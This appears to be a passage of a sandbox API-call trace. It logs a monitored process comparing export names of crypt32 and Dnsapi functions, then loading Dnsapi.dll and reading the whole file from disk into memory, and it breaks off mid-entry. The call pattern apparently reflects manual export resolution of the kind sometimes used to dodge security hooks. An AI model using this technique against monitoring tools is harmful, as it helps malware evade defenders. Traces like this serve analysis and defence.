[0263.108] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseServerOcspResponse") returned 1 [0263.108] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseStore") returned 0 [0263.108] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLContextToStore") returned 1 [0263.108] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLLinkToStore") returned 1 [0263.108] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLContextToStore") returned 1 [0263.108] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLLinkToStore") returned 1 [0263.108] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateContextToStore") returned 1 [0263.108] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateLinkToStore") returned 1 [0263.108] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCRLToStore") returned 1 [0263.108] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCTLToStore") returned 1 [0263.108] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToStore") returned 1 [0263.108] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0263.108] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0263.108] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0263.108] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponse") returned 1 [0263.108] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0263.108] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddSerializedElementToStore") returned 1 [0263.109] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddStoreToCollection") returned 1 [0263.109] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAlgIdToOID") returned 1 [0263.109] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseServerOcspResponse") returned 1 [0263.109] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseStore") returned 1 [0263.109] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCompareCertificate") returned 0 [0263.109] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLContextToStore") returned 1 [0263.109] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLLinkToStore") returned 1 [0263.109] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLContextToStore") returned 1 [0263.109] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLLinkToStore") returned 1 [0263.109] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateContextToStore") returned 1 [0263.109] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateLinkToStore") returned 1 [0263.109] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCRLToStore") returned 1 [0263.109] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCTLToStore") returned 1 [0263.109] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToStore") returned 1 [0263.109] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0263.109] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0263.109] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0263.109] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponse") returned 1 [0263.109] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0263.109] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddSerializedElementToStore") returned 1 [0263.109] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddStoreToCollection") returned 1 [0263.109] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAlgIdToOID") returned 1 [0263.109] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseServerOcspResponse") returned 1 [0263.109] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseStore") returned 1 [0263.109] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificate") returned 1 [0263.109] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificateName") returned 0 [0263.110] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLContextToStore") returned 1 [0263.110] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLLinkToStore") returned 1 [0263.110] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLContextToStore") returned 1 [0263.110] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLLinkToStore") returned 1 [0263.110] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateContextToStore") returned 1 [0263.110] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateLinkToStore") returned 1 [0263.110] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCRLToStore") returned 1 [0263.110] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCTLToStore") returned 1 [0263.110] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToStore") returned 1 [0263.110] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0263.110] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0263.110] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0263.110] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponse") returned 1 [0263.110] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0263.110] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddSerializedElementToStore") returned 1 [0263.110] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddStoreToCollection") returned 1 [0263.110] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAlgIdToOID") returned 1 [0263.110] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertCloseServerOcspResponse") returned 1 [0263.123] GetProcessHeap () returned 0x4a0000 [0263.124] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4151040 | out: hHeap=0x4a0000) returned 1 [0263.134] GetProcessHeap () returned 0x4a0000 [0263.136] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4b9020 [0263.137] LoadLibraryA (lpLibFileName="Dnsapi.dll") returned 0x7ffc5a8a0000 [0263.261] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0263.262] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0263.262] GetModuleFileNameA (in: hModule=0x7ffc5a8a0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")) returned 0x1e [0263.262] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0263.263] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0263.263] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0263.263] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=686984) returned 1 [0263.263] GetProcessHeap () returned 0x4a0000 [0263.263] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa7b88) returned 0x3acd010 [0263.265] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0263.265] ReadFile (in: hFile=0x17c, lpBuffer=0x3acd010, nNumberOfBytesToRead=0xa7b88, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x3acd010*, lpNumberOfBytesRead=0x14f5a4*=0xa7b88, lpOverlapped=0x0) returned 1 [0263.452] CloseHandle (hObject=0x17c) returned 1 [0263.452] lstrcmpA (lpString1="AdaptiveTimeout_ClearInterfaceSpecificConfiguration", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 0 [0263.453] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0263.454] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 0 [0263.455] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0263.459] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0263.459] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 0 [0263.459] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0263.459] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0263.460] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AddRefQueryBlobEx") returned 1 [0263.460] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="BreakRecordsIntoBlob") returned 0 [0263.462] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0263.468] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0263.468] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AddRefQueryBlobEx") returned 1 [0263.470] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="BreakRecordsIntoBlob") returned 1 [0263.470] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="Coalesce_UpdateNetVersion") returned 0 [0263.470] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0263.470] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0263.470] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AddRefQueryBlobEx") returned 1 [0263.470] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="BreakRecordsIntoBlob") returned 1 [0263.470] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="Coalesce_UpdateNetVersion") returned 1 [0263.470] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="CombineRecordsInBlob") returned 0 [0263.470] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0263.470] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0263.471] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 1 [0263.471] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="BreakRecordsIntoBlob") returned 1 [0263.471] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0263.471] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="CombineRecordsInBlob") returned 1 [0263.471] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="DeRefQueryBlobEx") returned 0 [0263.471] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0263.471] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0263.471] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AddRefQueryBlobEx") returned 1 [0263.471] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="BreakRecordsIntoBlob") returned 1 [0263.471] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="Coalesce_UpdateNetVersion") returned 1 [0263.471] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="CombineRecordsInBlob") returned 1 [0263.471] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DeRefQueryBlobEx") returned -1 [0263.471] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DelaySortDAServerlist") returned 0 [0263.472] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0263.472] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0263.472] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AddRefQueryBlobEx") returned 1 [0263.472] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="BreakRecordsIntoBlob") returned 1 [0263.472] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="Coalesce_UpdateNetVersion") returned 1 [0263.472] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="CombineRecordsInBlob") returned 1 [0263.472] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DeRefQueryBlobEx") returned 1 [0263.472] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DelaySortDAServerlist") returned 1 [0263.472] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DnsAcquireContextHandle_A") returned 0 [0263.472] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0263.472] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0263.472] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AddRefQueryBlobEx") returned 1 [0263.472] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="BreakRecordsIntoBlob") returned 1 [0263.472] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="Coalesce_UpdateNetVersion") returned 1 [0263.472] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="CombineRecordsInBlob") returned 1 [0263.482] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DeRefQueryBlobEx") returned 1 [0263.482] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DelaySortDAServerlist") returned 1 [0263.482] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_A") returned 1 [0263.483] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_W") returned 0 [0263.483] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0263.484] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0263.486] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AddRefQueryBlobEx") returned 1 [0263.486] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="BreakRecordsIntoBlob") returned 1 [0263.486] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="Coalesce_UpdateNetVersion") returned 1 [0263.487] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="CombineRecordsInBlob") returned 1 [0263.487] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DeRefQueryBlobEx") returned 1 [0263.487] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DelaySortDAServerlist") returned 1 [0263.487] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_A") returned 1 [0263.487] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_W") returned 1 [0263.487] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAllocateRecord") returned 0 [0263.487] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0263.487] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0263.487] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AddRefQueryBlobEx") returned 1 [0263.487] lstrcmpA (lpString1="DnsApiAlloc", lpString2="BreakRecordsIntoBlob") returned 1 [0263.487] lstrcmpA (lpString1="DnsApiAlloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0263.487] lstrcmpA (lpString1="DnsApiAlloc", lpString2="CombineRecordsInBlob") returned 1 [0263.487] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DeRefQueryBlobEx") returned 1 [0263.487] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DelaySortDAServerlist") returned 1 [0263.487] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0263.487] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0263.487] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAllocateRecord") returned 1 [0263.487] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsApiAlloc") returned 0 [0263.488] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0263.488] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0263.488] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AddRefQueryBlobEx") returned 1 [0263.488] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="BreakRecordsIntoBlob") returned 1 [0263.488] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="Coalesce_UpdateNetVersion") returned 1 [0263.488] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="CombineRecordsInBlob") returned 1 [0263.488] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DeRefQueryBlobEx") returned 1 [0263.488] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DelaySortDAServerlist") returned 1 [0263.488] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_A") returned 1 [0263.488] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_W") returned 1 [0263.488] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAllocateRecord") returned 1 [0263.488] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAlloc") returned 1 [0263.488] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAllocZero") returned 0 [0263.488] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0263.488] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0263.488] lstrcmpA (lpString1="DnsApiFree", lpString2="AddRefQueryBlobEx") returned 1 [0263.488] lstrcmpA (lpString1="DnsApiFree", lpString2="BreakRecordsIntoBlob") returned 1 [0263.488] lstrcmpA (lpString1="DnsApiFree", lpString2="Coalesce_UpdateNetVersion") returned 1 [0263.488] lstrcmpA (lpString1="DnsApiFree", lpString2="CombineRecordsInBlob") returned 1 [0263.489] lstrcmpA (lpString1="DnsApiFree", lpString2="DeRefQueryBlobEx") returned 1 [0263.489] lstrcmpA (lpString1="DnsApiFree", lpString2="DelaySortDAServerlist") returned 1 [0263.489] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_A") returned 1 [0263.489] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_W") returned 1 [0263.489] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAllocateRecord") returned 1 [0263.489] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAlloc") returned 1 [0263.489] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAllocZero") returned 1 [0263.489] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiFree") returned 0 [0263.490] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0263.491] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0263.491] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AddRefQueryBlobEx") returned 1 [0263.491] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="BreakRecordsIntoBlob") returned 1 [0263.491] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="Coalesce_UpdateNetVersion") returned 1 [0263.491] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="CombineRecordsInBlob") returned 1 [0263.491] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DeRefQueryBlobEx") returned 1 [0263.491] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DelaySortDAServerlist") returned 1 [0263.491] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_A") returned 1 [0263.493] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_W") returned 1 [0263.493] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAllocateRecord") returned 1 [0263.493] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAlloc") returned 1 [0263.493] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAllocZero") returned 1 [0263.494] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiFree") returned 1 [0263.494] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiHeapReset") returned 0 [0263.495] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0263.495] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0263.495] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AddRefQueryBlobEx") returned 1 [0263.495] lstrcmpA (lpString1="DnsApiRealloc", lpString2="BreakRecordsIntoBlob") returned 1 [0263.495] lstrcmpA (lpString1="DnsApiRealloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0263.495] lstrcmpA (lpString1="DnsApiRealloc", lpString2="CombineRecordsInBlob") returned 1 [0263.495] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DeRefQueryBlobEx") returned 1 [0263.495] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DelaySortDAServerlist") returned 1 [0263.495] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0263.495] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0263.495] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAllocateRecord") returned 1 [0263.495] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAlloc") returned 1 [0263.495] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAllocZero") returned 1 [0263.495] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiFree") returned 1 [0263.495] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiHeapReset") returned 1 [0263.495] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiRealloc") returned 0 [0263.495] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0263.495] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0263.495] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AddRefQueryBlobEx") returned 1 [0263.495] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="BreakRecordsIntoBlob") returned 1 [0263.495] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="Coalesce_UpdateNetVersion") returned 1 [0263.495] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="CombineRecordsInBlob") returned 1 [0263.495] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DeRefQueryBlobEx") returned 1 [0263.495] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DelaySortDAServerlist") returned 1 [0263.496] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_A") returned 1 [0263.496] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_W") returned 1 [0263.496] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAllocateRecord") returned 1 [0263.496] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAlloc") returned 1 [0263.496] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAllocZero") returned 1 [0263.496] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiFree") returned 1 [0263.496] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiHeapReset") returned 1 [0263.496] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiRealloc") returned 1 [0263.496] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiSetDebugGlobals") returned 0 [0263.496] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0263.496] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0263.496] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AddRefQueryBlobEx") returned 1 [0263.496] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="BreakRecordsIntoBlob") returned 1 [0263.496] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="Coalesce_UpdateNetVersion") returned 1 [0263.496] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="CombineRecordsInBlob") returned 1 [0263.496] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DeRefQueryBlobEx") returned 1 [0263.496] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DelaySortDAServerlist") returned 1 [0263.496] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_A") returned 1 [0263.496] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_W") returned 1 [0263.496] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAllocateRecord") returned 1 [0263.496] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAlloc") returned 1 [0263.496] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAllocZero") returned 1 [0263.496] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiFree") returned 1 [0263.496] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiHeapReset") returned 1 [0263.496] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiRealloc") returned 1 [0263.496] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiSetDebugGlobals") returned 1 [0263.496] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAsyncRegisterHostAddrs") returned 0 [0263.497] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0263.497] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0263.497] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AddRefQueryBlobEx") returned 1 [0263.497] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="BreakRecordsIntoBlob") returned 1 [0263.497] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="Coalesce_UpdateNetVersion") returned 1 [0263.497] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="CombineRecordsInBlob") returned 1 [0263.497] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DeRefQueryBlobEx") returned 1 [0263.497] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DelaySortDAServerlist") returned 1 [0263.497] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_A") returned 1 [0263.497] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_W") returned 1 [0263.497] lstrcmpA (lpString1="DnsAsyncRegisterInit", 